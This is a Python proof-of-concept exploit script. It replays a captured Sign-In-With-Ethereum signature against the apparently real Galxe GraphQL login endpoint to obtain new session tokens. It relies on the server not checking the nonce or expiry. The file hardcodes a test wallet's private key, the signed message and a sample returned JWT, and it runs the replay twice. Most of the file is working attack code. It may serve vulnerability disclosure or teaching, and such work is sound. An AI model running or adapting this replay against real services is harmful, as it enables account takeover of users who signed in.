from curl_cffi import requests
from eth_account.messages import encode_defunct
from eth_account import Account
import time

# A test account. Never send eths to this account!
# In the real world, the private key is stored in the user's crypto wallet, and the attacker can't get it.
# Here, we just use a test account to simulate the user's crypto wallet.
PRIVATE_KEY = 'f78411d5886f5ded63cd304b9b56dd87b05ce0922223e87b4927cc56bfaa7b02'
ADDRESS = '0x36E7C6FeB20A90b07F63863D09cC12C4c9f39064'


def sign_msg(msg, private_key = PRIVATE_KEY):
    '''
    Sign message with private key
    This function mocks the user signing the message with the crypto wallet.
    '''
    msg = encode_defunct(text=msg)
    account = Account.from_key(private_key)
    sig =  account.sign_message(msg)
    return sig.signature.hex()


def replay_attack():
    '''
    Replay attack
    Not check the nonce.
    The message has a nonce and expiration time, but the server does not check it.
    So we can replay the message to get the token.
    '''
    print('\n#Replay attack...')

    session = requests.Session()

    payload = {'method': 'POST', 'url': 'https://graphigo.prd.galaxy.eco/query', 'headers': {'accept': '*/*', 'accept-language': 'zh-CN,zh;q=0.9', 'content-type': 'application/json', 'origin': 'https://galxe.com', 'sec-ch-ua': '"Chromium";v="112", "Microsoft Edge";v="112", "Not:A-Brand";v="99"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Windows"'}, 'params': {}, 'data': b'{"operationName":"SignIn","variables":{"input":{"address":"0x36E7C6FeB20A90b07F63863D09cC12C4c9f39064","message":"galxe.com wants you to sign in with your Ethereum account:\\n0x36E7C6FeB20A90b07F63863D09cC12C4c9f39064\\n\\nSign in with Ethereum to the app.\\n\\nURI: https://galxe.com\\nVersion: 1\\nChain ID: 1\\nNonce: WyiTj2tJ8VGfWzx6L\\nIssued At: 2023-04-12T10:56:11.158Z\\nExpiration Time: 2023-04-13T10:56:11.149Z\\nNot Before: 2023-04-13T10:56:11.149Z","signature":"0x49faf7606458fc75d6594e86db4b39a0da305329ba498c955761aae5939caeb57eb9edcfbd0a05ae585ddb5b2c5dde72b03dc5ed7b36971b91caecb54edfa7fa1b"}},"query":"mutation SignIn($input: Auth) {\\n  signin(input: $input)\\n}\\n"}', 'timeout': 10, 'impersonate': None}

    # Nonce WyiTj2tJ8VGfWzx6L is generated by front-end, we can replay it

    response = session.request(**payload)

    '''
    200 {"data":{"signin":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJBZGRyZXNzIjoiMHgzNkU3QzZGZUIyMEE5MGIwN0Y2Mzg2M0QwOWNDMTJDNGM5ZjM5MDY0IiwiTm9uY2UiOiJXeWlUajJ0SjhWR2ZXeng2TCIsImV4cCI6MTY4NTU3ODYzOSwiSnd0RXJyb3IiOm51bGx9.45Rm_MFFaoY45SQAevnzGxBplj-XhBpAkCJtUxc7vuQ"}}
    '''

    print('Requesting token from the server...')
    response = session.request(**payload)
    print('Response code:', response.status_code)
    print('Response text:', response.text)
   

# Once an attacker get the signature, he can replay it to get the token
# Here we run two attack, each time we can get a new token. We can use the token to access the user's account.
    
if __name__ == '__main__':
    # Replay Attack
    replay_attack() # First request
    time.sleep(1) # Wait for 1 second
    replay_attack() # Second request